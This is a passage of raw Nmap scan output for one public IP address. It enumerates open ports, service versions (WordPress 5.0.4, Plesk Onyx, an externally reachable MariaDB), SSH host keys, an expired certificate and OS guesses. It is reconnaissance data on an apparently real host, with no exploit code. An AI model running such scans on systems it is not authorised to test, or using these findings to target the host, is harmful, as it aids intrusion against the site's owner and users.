- Completed Connect Scan at 07:48, 350.50s elapsed (65535 total ports)
- Initiating Service scan at 07:48
- Scanning 17 services on 37.58.63.157
- Completed Service scan at 07:49, 32.54s elapsed (17 services on 1 host)
- Initiating OS detection (try #1) against 37.58.63.157
- adjust_timeouts2: packet supposedly had rtt of -136625 microseconds. Ignoring time.
- adjust_timeouts2: packet supposedly had rtt of -136625 microseconds. Ignoring time.
- adjust_timeouts2: packet supposedly had rtt of -137808 microseconds. Ignoring time.
- adjust_timeouts2: packet supposedly had rtt of -137808 microseconds. Ignoring time.
- adjust_timeouts2: packet supposedly had rtt of -133125 microseconds. Ignoring time.
- adjust_timeouts2: packet supposedly had rtt of -133125 microseconds. Ignoring time.
- adjust_timeouts2: packet supposedly had rtt of -138179 microseconds. Ignoring time.
- adjust_timeouts2: packet supposedly had rtt of -138179 microseconds. Ignoring time.
- Retrying OS detection (try #2) against 37.58.63.157
- Initiating Traceroute at 07:49
- Completed Traceroute at 07:49, 3.02s elapsed
- Initiating Parallel DNS resolution of 13 hosts. at 07:49
- Completed Parallel DNS resolution of 13 hosts. at 07:49, 2.53s elapsed
- NSE: Script scanning 37.58.63.157.
- NSE: Starting runlevel 1 (of 2) scan.
- Initiating NSE at 07:49
- NSE Timing: About 99.87% done; ETC: 07:49 (0:00:00 remaining)
- NSE Timing: About 99.96% done; ETC: 07:50 (0:00:00 remaining)
- Completed NSE at 07:50, 71.56s elapsed
- NSE: Starting runlevel 2 (of 2) scan.
- Initiating NSE at 07:50
- Completed NSE at 07:50, 0.25s elapsed
- Nmap scan report for 37.58.63.157
- Host is up, received reset ttl 64 (0.11s latency).
- Scanned at 2019-05-02 07:42:38 EDT for 465s
- Not shown: 65514 closed ports
- Reason: 65514 conn-refused
- PORT STATE SERVICE REASON VERSION
- 21/tcp open ftp syn-ack ProFTPD
- |_ssl-date: TLS randomness does not represent time
- | tls-nextprotoneg:
- |_ ftp
- 22/tcp open ssh syn-ack OpenSSH 7.4 (protocol 2.0)
- | ssh-hostkey:
- | 2048 f9:ea:f1:f9:88:4c:35:23:4f:31:fb:38:17:f9:40:39 (RSA)
- | ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC3l/kUy/897AH6EzaGubX/bboIh1vUwfAnrYQFKU4JiMHp6oNlfBwXiwvxsjYfIcqw3fmmEV8WaSXDyiERmiHQJqoKGzPaKkwtJGKG48bl7M8F/Y+xTM3C9a7zLSn2KzRehJ6SHYsAOmdOnJHmK20803k+g1GlSixlcDShLeiKz5DljHmiVHPaXVYkpl5JcQpkUcYmGW5VtEyDdij4goxzD/yaY946cvbrfPNBgVy02mMzq2EW8qcOIcihGqHMglyn2jauXxT5vAj0qNnU3Ax1B+iMKbOtQikVaYyG9IVDMHzox1Ry1j03Sr3VZ6cQe0MY4y8kqMCaC5ElbWWxVRuX
- | 256 8c:07:13:65:fe:ef:69:09:f4:fb:ee:49:91:5a:33:38 (ECDSA)
- | ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBLZq/2Kk+lIuuUNmtWRYKrBiV0JPMiVqGL/c7knbY/zCoWbc8Qh/mBiQ2iXwLAlzzRZt02NYtNqfk/bG7FrvJWY=
- | 256 37:44:b4:9d:a4:1f:48:a1:d0:60:fe:4a:73:6c:99:67 (ED25519)
- |_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIHWJuHfj/3xMs2nwlu258i9yXQA6hIAhJIB9TVJdkz1o
- 53/tcp open domain syn-ack (unknown banner: none)
- | dns-nsid:
- |_ bind.version: none
- | fingerprint-strings:
- | DNSVersionBindReqTCP:
- | version
- | bind
- |_ none
- 80/tcp open http-proxy syn-ack Squid http proxy
- |_http-favicon: Unknown favicon MD5: D41D8CD98F00B204E9800998ECF8427E
- |_http-generator: WordPress 5.0.4
- | http-methods:
- |_ Supported Methods: GET HEAD POST OPTIONS
- |_http-open-proxy: Proxy might be redirecting requests
- | http-robots.txt: 1 disallowed entry
- |_/wp-admin/
- |_http-title: \xD8\xA7\xD9\x84\xD9\x85\xD8\xAC\xD9\x84\xD8\xB3 \xD8\xA7\xD9\x84\xD8\xA3\xD8\xB9\xD9\x84\xD9\x89 \xD9\x84\xD9\x84\xD8\xAF\xD8\xB9\xD9\x88\xD8\xA9 \xD9\x88\xD8\xA7\xD9\x84\xD8\xA5\xD8\xB1\xD8\xB4\xD8\xA7\xD8\xAF
- 106/tcp open pop3pw syn-ack poppassd
- 110/tcp open pop3 syn-ack Dovecot pop3d
- |_pop3-capabilities: APOP PIPELINING USER STLS SASL(PLAIN LOGIN DIGEST-MD5 CRAM-MD5) CAPA AUTH-RESP-CODE RESP-CODES UIDL TOP
- | ssl-cert: Subject: commonName=Plesk/organizationName=Odin/stateOrProvinceName=Washington/countryName=US/organizationalUnitName=Plesk/emailAddress=info@plesk.com/localityName=Seattle
- | Issuer: commonName=Plesk/organizationName=Odin/stateOrProvinceName=Washington/countryName=US/organizationalUnitName=Plesk/emailAddress=info@plesk.com/localityName=Seattle
- | Public Key type: rsa
- | Public Key bits: 2048
- | Signature Algorithm: sha256WithRSAEncryption
- | Not valid before: 2017-01-25T15:00:17
- | Not valid after: 2018-01-25T15:00:17
- | MD5: f72c c3dc 17bd 5d9a f097 4554 8548 0b61
- | SHA-1: 68a7 f4fb 70d5 1efa 24ee 5932 8433 549f 77fb a038
- | -----BEGIN CERTIFICATE-----
- | MIIDfTCCAmUCBFiIvYEwDQYJKoZIhvcNAQELBQAwgYIxCzAJBgNVBAYTAlVTMRMw
- | EQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdTZWF0dGxlMQ0wCwYDVQQKEwRP
- | ZGluMQ4wDAYDVQQLEwVQbGVzazEOMAwGA1UEAxMFUGxlc2sxHTAbBgkqhkiG9w0B
- | CQEWDmluZm9AcGxlc2suY29tMB4XDTE3MDEyNTE1MDAxN1oXDTE4MDEyNTE1MDAx
- | N1owgYIxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQH
- | EwdTZWF0dGxlMQ0wCwYDVQQKEwRPZGluMQ4wDAYDVQQLEwVQbGVzazEOMAwGA1UE
- | AxMFUGxlc2sxHTAbBgkqhkiG9w0BCQEWDmluZm9AcGxlc2suY29tMIIBIjANBgkq
- | hkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAsgqGE79DYVskIABCTNthDwmF7wIWleuy
- | K1kblrhSIxIg/Qbgw7JUi8x9aoWssgdSilIU6+JR7uAOQE7rk3n9d+NWG9yTB+yP
- | aFUdSBID3sbQH0DdSuN4MSsSU2uroQhTQBelPaJMJKpwGutsbxcbQ8DhEjCZZhgk
- | P4yrn4fOW+ipblP3Np76Jr5A5WIbCew/D7Y4PfJsVyEbh5i0PipN2m/6qbZCNy8n
- | paTpdJkWYW6gYSC7pfxyYPBJF60ksNkwxHwWODhNepBo3nOQDWgkQmC2SW7EwjvP
- | pZoFbKE04HZYYl94h/sscPDN7YpzUQq5/EzK+2rOM6WPRmqzwf/4QQIDAQABMA0G
- | CSqGSIb3DQEBCwUAA4IBAQBuqJKULbN/7H64/LEJJcuhQNy6k3EZ6t0u53H27Nbe
- | IgUY6wFcg4a92sMmAVxWKdPZIq5evfvhHDhnOU3JgvsJUGsqpd+2+b1TJP5SA9vB
- | KQ/7r4TPSetXJDDiS/j+GoyM9c8vrnWvAep0D9d8MOzp1hXgP2/5OAfHcUrHOStB
- | PRhKAaChSpekNPnTVimV8kyuXLxgZjjIa+fsTU1/MkdEFNKoyVmeZEg63uuVGeiW
- | 3OfaSMidBm9bvqoXdx7YjOo0F+MDJe6iInNF9uYLEZuigBCz2iNw7fzrzNiaGFrP
- | bU78zeLMnXyzs4090UBAKGPsc3lknr6s3B+2V1+MJFyg
- |_-----END CERTIFICATE-----
- |_ssl-date: TLS randomness does not represent time
- 135/tcp filtered msrpc no-response
- 136/tcp filtered profile no-response
- 137/tcp filtered netbios-ns no-response
- 138/tcp filtered netbios-dgm no-response
- 143/tcp open imap syn-ack Dovecot imapd
- |_imap-capabilities: SASL-IR Pre-login OK STARTTLS capabilities AUTH=LOGIN LITERAL+ more AUTH=PLAIN LOGIN-REFERRALS post-login listed have IDLE IMAP4rev1 ID AUTH=DIGEST-MD5 ENABLE AUTH=CRAM-MD5A0001
- | ssl-cert: Subject: commonName=Plesk/organizationName=Odin/stateOrProvinceName=Washington/countryName=US/organizationalUnitName=Plesk/emailAddress=info@plesk.com/localityName=Seattle
- | Issuer: commonName=Plesk/organizationName=Odin/stateOrProvinceName=Washington/countryName=US/organizationalUnitName=Plesk/emailAddress=info@plesk.com/localityName=Seattle
- | Public Key type: rsa
- | Public Key bits: 2048
- | Signature Algorithm: sha256WithRSAEncryption
- | Not valid before: 2017-01-25T15:00:17
- | Not valid after: 2018-01-25T15:00:17
- | MD5: f72c c3dc 17bd 5d9a f097 4554 8548 0b61
- | SHA-1: 68a7 f4fb 70d5 1efa 24ee 5932 8433 549f 77fb a038
- | -----BEGIN CERTIFICATE-----
- | MIIDfTCCAmUCBFiIvYEwDQYJKoZIhvcNAQELBQAwgYIxCzAJBgNVBAYTAlVTMRMw
- | EQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdTZWF0dGxlMQ0wCwYDVQQKEwRP
- | ZGluMQ4wDAYDVQQLEwVQbGVzazEOMAwGA1UEAxMFUGxlc2sxHTAbBgkqhkiG9w0B
- | CQEWDmluZm9AcGxlc2suY29tMB4XDTE3MDEyNTE1MDAxN1oXDTE4MDEyNTE1MDAx
- | N1owgYIxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQH
- | EwdTZWF0dGxlMQ0wCwYDVQQKEwRPZGluMQ4wDAYDVQQLEwVQbGVzazEOMAwGA1UE
- | AxMFUGxlc2sxHTAbBgkqhkiG9w0BCQEWDmluZm9AcGxlc2suY29tMIIBIjANBgkq
- | hkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAsgqGE79DYVskIABCTNthDwmF7wIWleuy
- | K1kblrhSIxIg/Qbgw7JUi8x9aoWssgdSilIU6+JR7uAOQE7rk3n9d+NWG9yTB+yP
- | aFUdSBID3sbQH0DdSuN4MSsSU2uroQhTQBelPaJMJKpwGutsbxcbQ8DhEjCZZhgk
- | P4yrn4fOW+ipblP3Np76Jr5A5WIbCew/D7Y4PfJsVyEbh5i0PipN2m/6qbZCNy8n
- | paTpdJkWYW6gYSC7pfxyYPBJF60ksNkwxHwWODhNepBo3nOQDWgkQmC2SW7EwjvP
- | pZoFbKE04HZYYl94h/sscPDN7YpzUQq5/EzK+2rOM6WPRmqzwf/4QQIDAQABMA0G
- | CSqGSIb3DQEBCwUAA4IBAQBuqJKULbN/7H64/LEJJcuhQNy6k3EZ6t0u53H27Nbe
- | IgUY6wFcg4a92sMmAVxWKdPZIq5evfvhHDhnOU3JgvsJUGsqpd+2+b1TJP5SA9vB
- | KQ/7r4TPSetXJDDiS/j+GoyM9c8vrnWvAep0D9d8MOzp1hXgP2/5OAfHcUrHOStB
- | PRhKAaChSpekNPnTVimV8kyuXLxgZjjIa+fsTU1/MkdEFNKoyVmeZEg63uuVGeiW
- | 3OfaSMidBm9bvqoXdx7YjOo0F+MDJe6iInNF9uYLEZuigBCz2iNw7fzrzNiaGFrP
- | bU78zeLMnXyzs4090UBAKGPsc3lknr6s3B+2V1+MJFyg
- |_-----END CERTIFICATE-----
- |_ssl-date: TLS randomness does not represent time
- 443/tcp open ssl/http syn-ack nginx
- |_http-favicon: Unknown favicon MD5: D41D8CD98F00B204E9800998ECF8427E
- |_http-generator: WordPress 5.0.4
- | http-methods:
- |_ Supported Methods: GET HEAD POST OPTIONS
- | http-robots.txt: 1 disallowed entry
- |_/wp-admin/
- |_http-server-header: nginx
- |_http-title: \xD8\xA7\xD9\x84\xD9\x85\xD8\xAC\xD9\x84\xD8\xB3 \xD8\xA7\xD9\x84\xD8\xA3\xD8\xB9\xD9\x84\xD9\x89 \xD9\x84\xD9\x84\xD8\xAF\xD8\xB9\xD9\x88\xD8\xA9 \xD9\x88\xD8\xA7\xD9\x84\xD8\xA5\xD8\xB1\xD8\xB4\xD8\xA7\xD8\xAF
- | ssl-cert: Subject: commonName=Plesk/organizationName=Odin/stateOrProvinceName=Washington/countryName=US/organizationalUnitName=Plesk/emailAddress=info@plesk.com/localityName=Seattle
- | Issuer: commonName=Plesk/organizationName=Odin/stateOrProvinceName=Washington/countryName=US/organizationalUnitName=Plesk/emailAddress=info@plesk.com/localityName=Seattle
- | Public Key type: rsa
- | Public Key bits: 2048
- | Signature Algorithm: sha256WithRSAEncryption
- | Not valid before: 2017-01-25T15:00:17
- | Not valid after: 2018-01-25T15:00:17
- | MD5: f72c c3dc 17bd 5d9a f097 4554 8548 0b61
- | SHA-1: 68a7 f4fb 70d5 1efa 24ee 5932 8433 549f 77fb a038
- | -----BEGIN CERTIFICATE-----
- | MIIDfTCCAmUCBFiIvYEwDQYJKoZIhvcNAQELBQAwgYIxCzAJBgNVBAYTAlVTMRMw
- | EQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdTZWF0dGxlMQ0wCwYDVQQKEwRP
- | ZGluMQ4wDAYDVQQLEwVQbGVzazEOMAwGA1UEAxMFUGxlc2sxHTAbBgkqhkiG9w0B
- | CQEWDmluZm9AcGxlc2suY29tMB4XDTE3MDEyNTE1MDAxN1oXDTE4MDEyNTE1MDAx
- | N1owgYIxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQH
- | EwdTZWF0dGxlMQ0wCwYDVQQKEwRPZGluMQ4wDAYDVQQLEwVQbGVzazEOMAwGA1UE
- | AxMFUGxlc2sxHTAbBgkqhkiG9w0BCQEWDmluZm9AcGxlc2suY29tMIIBIjANBgkq
- | hkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAsgqGE79DYVskIABCTNthDwmF7wIWleuy
- | K1kblrhSIxIg/Qbgw7JUi8x9aoWssgdSilIU6+JR7uAOQE7rk3n9d+NWG9yTB+yP
- | aFUdSBID3sbQH0DdSuN4MSsSU2uroQhTQBelPaJMJKpwGutsbxcbQ8DhEjCZZhgk
- | P4yrn4fOW+ipblP3Np76Jr5A5WIbCew/D7Y4PfJsVyEbh5i0PipN2m/6qbZCNy8n
- | paTpdJkWYW6gYSC7pfxyYPBJF60ksNkwxHwWODhNepBo3nOQDWgkQmC2SW7EwjvP
- | pZoFbKE04HZYYl94h/sscPDN7YpzUQq5/EzK+2rOM6WPRmqzwf/4QQIDAQABMA0G
- | CSqGSIb3DQEBCwUAA4IBAQBuqJKULbN/7H64/LEJJcuhQNy6k3EZ6t0u53H27Nbe
- | IgUY6wFcg4a92sMmAVxWKdPZIq5evfvhHDhnOU3JgvsJUGsqpd+2+b1TJP5SA9vB
- | KQ/7r4TPSetXJDDiS/j+GoyM9c8vrnWvAep0D9d8MOzp1hXgP2/5OAfHcUrHOStB
- | PRhKAaChSpekNPnTVimV8kyuXLxgZjjIa+fsTU1/MkdEFNKoyVmeZEg63uuVGeiW
- | 3OfaSMidBm9bvqoXdx7YjOo0F+MDJe6iInNF9uYLEZuigBCz2iNw7fzrzNiaGFrP
- | bU78zeLMnXyzs4090UBAKGPsc3lknr6s3B+2V1+MJFyg
- |_-----END CERTIFICATE-----
- |_ssl-date: TLS randomness does not represent time
- | tls-alpn:
- | h2
- |_ http/1.1
- | tls-nextprotoneg:
- | h2
- |_ http/1.1
- 465/tcp open ssl/smtps? syn-ack
- |_smtp-commands: Couldn't establish connection on port 465
- |_ssl-date: TLS randomness does not represent time
- 993/tcp open ssl/imap syn-ack Dovecot imapd
- |_imap-capabilities: SASL-IR Pre-login OK capabilities AUTH=LOGIN LITERAL+ more IDLE LOGIN-REFERRALS post-login listed have AUTH=CRAM-MD5A0001 IMAP4rev1 ID AUTH=DIGEST-MD5 ENABLE AUTH=PLAIN
- | ssl-cert: Subject: commonName=Plesk/organizationName=Odin/stateOrProvinceName=Washington/countryName=US/organizationalUnitName=Plesk/emailAddress=info@plesk.com/localityName=Seattle
- | Issuer: commonName=Plesk/organizationName=Odin/stateOrProvinceName=Washington/countryName=US/organizationalUnitName=Plesk/emailAddress=info@plesk.com/localityName=Seattle
- | Public Key type: rsa
- | Public Key bits: 2048
- | Signature Algorithm: sha256WithRSAEncryption
- | Not valid before: 2017-01-25T15:00:17
- | Not valid after: 2018-01-25T15:00:17
- | MD5: f72c c3dc 17bd 5d9a f097 4554 8548 0b61
- | SHA-1: 68a7 f4fb 70d5 1efa 24ee 5932 8433 549f 77fb a038
- | -----BEGIN CERTIFICATE-----
- | MIIDfTCCAmUCBFiIvYEwDQYJKoZIhvcNAQELBQAwgYIxCzAJBgNVBAYTAlVTMRMw
- | EQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdTZWF0dGxlMQ0wCwYDVQQKEwRP
- | ZGluMQ4wDAYDVQQLEwVQbGVzazEOMAwGA1UEAxMFUGxlc2sxHTAbBgkqhkiG9w0B
- | CQEWDmluZm9AcGxlc2suY29tMB4XDTE3MDEyNTE1MDAxN1oXDTE4MDEyNTE1MDAx
- | N1owgYIxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQH
- | EwdTZWF0dGxlMQ0wCwYDVQQKEwRPZGluMQ4wDAYDVQQLEwVQbGVzazEOMAwGA1UE
- | AxMFUGxlc2sxHTAbBgkqhkiG9w0BCQEWDmluZm9AcGxlc2suY29tMIIBIjANBgkq
- | hkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAsgqGE79DYVskIABCTNthDwmF7wIWleuy
- | K1kblrhSIxIg/Qbgw7JUi8x9aoWssgdSilIU6+JR7uAOQE7rk3n9d+NWG9yTB+yP
- | aFUdSBID3sbQH0DdSuN4MSsSU2uroQhTQBelPaJMJKpwGutsbxcbQ8DhEjCZZhgk
- | P4yrn4fOW+ipblP3Np76Jr5A5WIbCew/D7Y4PfJsVyEbh5i0PipN2m/6qbZCNy8n
- | paTpdJkWYW6gYSC7pfxyYPBJF60ksNkwxHwWODhNepBo3nOQDWgkQmC2SW7EwjvP
- | pZoFbKE04HZYYl94h/sscPDN7YpzUQq5/EzK+2rOM6WPRmqzwf/4QQIDAQABMA0G
- | CSqGSIb3DQEBCwUAA4IBAQBuqJKULbN/7H64/LEJJcuhQNy6k3EZ6t0u53H27Nbe
- | IgUY6wFcg4a92sMmAVxWKdPZIq5evfvhHDhnOU3JgvsJUGsqpd+2+b1TJP5SA9vB
- | KQ/7r4TPSetXJDDiS/j+GoyM9c8vrnWvAep0D9d8MOzp1hXgP2/5OAfHcUrHOStB
- | PRhKAaChSpekNPnTVimV8kyuXLxgZjjIa+fsTU1/MkdEFNKoyVmeZEg63uuVGeiW
- | 3OfaSMidBm9bvqoXdx7YjOo0F+MDJe6iInNF9uYLEZuigBCz2iNw7fzrzNiaGFrP
- | bU78zeLMnXyzs4090UBAKGPsc3lknr6s3B+2V1+MJFyg
- |_-----END CERTIFICATE-----
- |_ssl-date: TLS randomness does not represent time
- 995/tcp open ssl/pop3 syn-ack Dovecot pop3d
- |_pop3-capabilities: APOP PIPELINING USER SASL(PLAIN LOGIN DIGEST-MD5 CRAM-MD5) CAPA AUTH-RESP-CODE RESP-CODES UIDL TOP
- | ssl-cert: Subject: commonName=Plesk/organizationName=Odin/stateOrProvinceName=Washington/countryName=US/organizationalUnitName=Plesk/emailAddress=info@plesk.com/localityName=Seattle
- | Issuer: commonName=Plesk/organizationName=Odin/stateOrProvinceName=Washington/countryName=US/organizationalUnitName=Plesk/emailAddress=info@plesk.com/localityName=Seattle
- | Public Key type: rsa
- | Public Key bits: 2048
- | Signature Algorithm: sha256WithRSAEncryption
- | Not valid before: 2017-01-25T15:00:17
- | Not valid after: 2018-01-25T15:00:17
- | MD5: f72c c3dc 17bd 5d9a f097 4554 8548 0b61
- | SHA-1: 68a7 f4fb 70d5 1efa 24ee 5932 8433 549f 77fb a038
- | -----BEGIN CERTIFICATE-----
- | MIIDfTCCAmUCBFiIvYEwDQYJKoZIhvcNAQELBQAwgYIxCzAJBgNVBAYTAlVTMRMw
- | EQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdTZWF0dGxlMQ0wCwYDVQQKEwRP
- | ZGluMQ4wDAYDVQQLEwVQbGVzazEOMAwGA1UEAxMFUGxlc2sxHTAbBgkqhkiG9w0B
- | CQEWDmluZm9AcGxlc2suY29tMB4XDTE3MDEyNTE1MDAxN1oXDTE4MDEyNTE1MDAx
- | N1owgYIxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQH
- | EwdTZWF0dGxlMQ0wCwYDVQQKEwRPZGluMQ4wDAYDVQQLEwVQbGVzazEOMAwGA1UE
- | AxMFUGxlc2sxHTAbBgkqhkiG9w0BCQEWDmluZm9AcGxlc2suY29tMIIBIjANBgkq
- | hkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAsgqGE79DYVskIABCTNthDwmF7wIWleuy
- | K1kblrhSIxIg/Qbgw7JUi8x9aoWssgdSilIU6+JR7uAOQE7rk3n9d+NWG9yTB+yP
- | aFUdSBID3sbQH0DdSuN4MSsSU2uroQhTQBelPaJMJKpwGutsbxcbQ8DhEjCZZhgk
- | P4yrn4fOW+ipblP3Np76Jr5A5WIbCew/D7Y4PfJsVyEbh5i0PipN2m/6qbZCNy8n
- | paTpdJkWYW6gYSC7pfxyYPBJF60ksNkwxHwWODhNepBo3nOQDWgkQmC2SW7EwjvP
- | pZoFbKE04HZYYl94h/sscPDN7YpzUQq5/EzK+2rOM6WPRmqzwf/4QQIDAQABMA0G
- | CSqGSIb3DQEBCwUAA4IBAQBuqJKULbN/7H64/LEJJcuhQNy6k3EZ6t0u53H27Nbe
- | IgUY6wFcg4a92sMmAVxWKdPZIq5evfvhHDhnOU3JgvsJUGsqpd+2+b1TJP5SA9vB
- | KQ/7r4TPSetXJDDiS/j+GoyM9c8vrnWvAep0D9d8MOzp1hXgP2/5OAfHcUrHOStB
- | PRhKAaChSpekNPnTVimV8kyuXLxgZjjIa+fsTU1/MkdEFNKoyVmeZEg63uuVGeiW
- | 3OfaSMidBm9bvqoXdx7YjOo0F+MDJe6iInNF9uYLEZuigBCz2iNw7fzrzNiaGFrP
- | bU78zeLMnXyzs4090UBAKGPsc3lknr6s3B+2V1+MJFyg
- |_-----END CERTIFICATE-----
- |_ssl-date: TLS randomness does not represent time
- 3306/tcp open mysql syn-ack MySQL 5.5.60-MariaDB
- | mysql-info:
- | Protocol: 10
- | Version: 5.5.60-MariaDB
- | Thread ID: 13774
- | Capabilities flags: 63487
- | Some Capabilities: Speaks41ProtocolOld, Support41Auth, SupportsLoadDataLocal, IgnoreSpaceBeforeParenthesis, LongColumnFlag, LongPassword, InteractiveClient, IgnoreSigpipes, Speaks41ProtocolNew, SupportsTransactions, FoundRows, ConnectWithDatabase, DontAllowDatabaseTableColumn, ODBCClient, SupportsCompression, SupportsMultipleStatments, SupportsAuthPlugins, SupportsMultipleResults
- | Status: Autocommit
- | Salt: HyJF`0nXPi=79Z9N\ecD
- |_ Auth Plugin Name: 87
- 4190/tcp open sieve syn-ack Dovecot Pigeonhole sieve 1.0
- 7080/tcp open http syn-ack Apache httpd
- |_http-favicon: Unknown favicon MD5: D41D8CD98F00B204E9800998ECF8427E
- |_http-generator: WordPress 5.0.4
- | http-methods:
- |_ Supported Methods: GET HEAD POST OPTIONS
- | http-robots.txt: 1 disallowed entry
- |_/wp-admin/
- |_http-server-header: Apache
- |_http-title: \xD8\xA7\xD9\x84\xD9\x85\xD8\xAC\xD9\x84\xD8\xB3 \xD8\xA7\xD9\x84\xD8\xA3\xD8\xB9\xD9\x84\xD9\x89 \xD9\x84\xD9\x84\xD8\xAF\xD8\xB9\xD9\x88\xD8\xA9 \xD9\x88\xD8\xA7\xD9\x84\xD8\xA5\xD8\xB1\xD8\xB4\xD8\xA7\xD8\xAF
- 7081/tcp open http syn-ack Apache httpd
- | http-methods:
- |_ Supported Methods: GET HEAD POST
- |_http-server-header: Apache
- |_http-title: 400 Bad Request
- 8443/tcp open ssl/http syn-ack sw-cp-server httpd (Plesk Onyx 17.8.11)
- |_http-favicon: Unknown favicon MD5: 1DB747255C64A30F9236E9D929E986CA
- | http-methods:
- |_ Supported Methods: GET HEAD POST
- |_http-server-header: sw-cp-server
- |_http-title: Plesk Onyx 17.8.11
- | ssl-cert: Subject: commonName=Plesk/organizationName=Odin/stateOrProvinceName=Washington/countryName=US/organizationalUnitName=Plesk/emailAddress=info@plesk.com/localityName=Seattle
- | Issuer: commonName=Plesk/organizationName=Odin/stateOrProvinceName=Washington/countryName=US/organizationalUnitName=Plesk/emailAddress=info@plesk.com/localityName=Seattle
- | Public Key type: rsa
- | Public Key bits: 2048
- | Signature Algorithm: sha256WithRSAEncryption
- | Not valid before: 2017-01-25T15:00:17
- | Not valid after: 2018-01-25T15:00:17
- | MD5: f72c c3dc 17bd 5d9a f097 4554 8548 0b61
- | SHA-1: 68a7 f4fb 70d5 1efa 24ee 5932 8433 549f 77fb a038
- | -----BEGIN CERTIFICATE-----
- | MIIDfTCCAmUCBFiIvYEwDQYJKoZIhvcNAQELBQAwgYIxCzAJBgNVBAYTAlVTMRMw
- | EQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdTZWF0dGxlMQ0wCwYDVQQKEwRP
- | ZGluMQ4wDAYDVQQLEwVQbGVzazEOMAwGA1UEAxMFUGxlc2sxHTAbBgkqhkiG9w0B
- | CQEWDmluZm9AcGxlc2suY29tMB4XDTE3MDEyNTE1MDAxN1oXDTE4MDEyNTE1MDAx
- | N1owgYIxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQH
- | EwdTZWF0dGxlMQ0wCwYDVQQKEwRPZGluMQ4wDAYDVQQLEwVQbGVzazEOMAwGA1UE
- | AxMFUGxlc2sxHTAbBgkqhkiG9w0BCQEWDmluZm9AcGxlc2suY29tMIIBIjANBgkq
- | hkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAsgqGE79DYVskIABCTNthDwmF7wIWleuy
- | K1kblrhSIxIg/Qbgw7JUi8x9aoWssgdSilIU6+JR7uAOQE7rk3n9d+NWG9yTB+yP
- | aFUdSBID3sbQH0DdSuN4MSsSU2uroQhTQBelPaJMJKpwGutsbxcbQ8DhEjCZZhgk
- | P4yrn4fOW+ipblP3Np76Jr5A5WIbCew/D7Y4PfJsVyEbh5i0PipN2m/6qbZCNy8n
- | paTpdJkWYW6gYSC7pfxyYPBJF60ksNkwxHwWODhNepBo3nOQDWgkQmC2SW7EwjvP
- | pZoFbKE04HZYYl94h/sscPDN7YpzUQq5/EzK+2rOM6WPRmqzwf/4QQIDAQABMA0G
- | CSqGSIb3DQEBCwUAA4IBAQBuqJKULbN/7H64/LEJJcuhQNy6k3EZ6t0u53H27Nbe
- | IgUY6wFcg4a92sMmAVxWKdPZIq5evfvhHDhnOU3JgvsJUGsqpd+2+b1TJP5SA9vB
- | KQ/7r4TPSetXJDDiS/j+GoyM9c8vrnWvAep0D9d8MOzp1hXgP2/5OAfHcUrHOStB
- | PRhKAaChSpekNPnTVimV8kyuXLxgZjjIa+fsTU1/MkdEFNKoyVmeZEg63uuVGeiW
- | 3OfaSMidBm9bvqoXdx7YjOo0F+MDJe6iInNF9uYLEZuigBCz2iNw7fzrzNiaGFrP
- | bU78zeLMnXyzs4090UBAKGPsc3lknr6s3B+2V1+MJFyg
- |_-----END CERTIFICATE-----
- |_ssl-date: TLS randomness does not represent time
- | tls-nextprotoneg:
- |_ http/1.1
- 8880/tcp open http syn-ack sw-cp-server httpd (Plesk Onyx 17.8.11)
- |_http-favicon: Unknown favicon MD5: 1DB747255C64A30F9236E9D929E986CA
- | http-methods:
- |_ Supported Methods: GET HEAD POST
- | http-robots.txt: 1 disallowed entry
- |_/
- |_http-server-header: sw-cp-server
- |_http-title: Plesk Onyx 17.8.11
- 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
- SF-Port53-TCP:V=7.70%I=7%D=5/2%Time=5CCAD917%P=x86_64-pc-linux-gnu%r(DNSVe
- SF:rsionBindReqTCP,3F,"\0=\0\x06\x85\0\0\x01\0\x01\0\x01\0\0\x07version\x0
- SF:4bind\0\0\x10\0\x03\xc0\x0c\0\x10\0\x03\0\0\0\0\0\x05\x04none\xc0\x0c\0
- SF:\x02\0\x03\0\0\0\0\0\x02\xc0\x0c");
- OS fingerprint not ideal because: Host distance (14 network hops) is greater than five
- Aggressive OS guesses: Linux 3.10 - 4.11 (95%), HP P2000 G3 NAS device (93%), Linux 3.2 - 4.9 (92%), Linux 3.13 (92%), Linux 3.13 or 4.2 (92%), Linux 3.16 - 4.6 (92%), Linux 4.1 (92%), Linux 4.10 (92%), Linux 4.2 (92%), Linux 4.4 (92%)
- No exact OS matches for host (test conditions non-ideal).
- TCP/IP fingerprint:
- SCAN(V=7.70%E=4%D=5/2%OT=21%CT=1%CU=42219%PV=N%DS=14%DC=T%G=N%TM=5CCAD97F%P=x86_64-pc-linux-gnu)
- SEQ(SP=102%GCD=1%ISR=10B%TI=Z%TS=A)
- OPS(O1=M44FST11NW7%O2=M44FST11NW7%O3=M44FNNT11NW7%O4=M44FST11NW7%O5=M44FST11NW7%O6=M44FST11)
- WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6=7120)
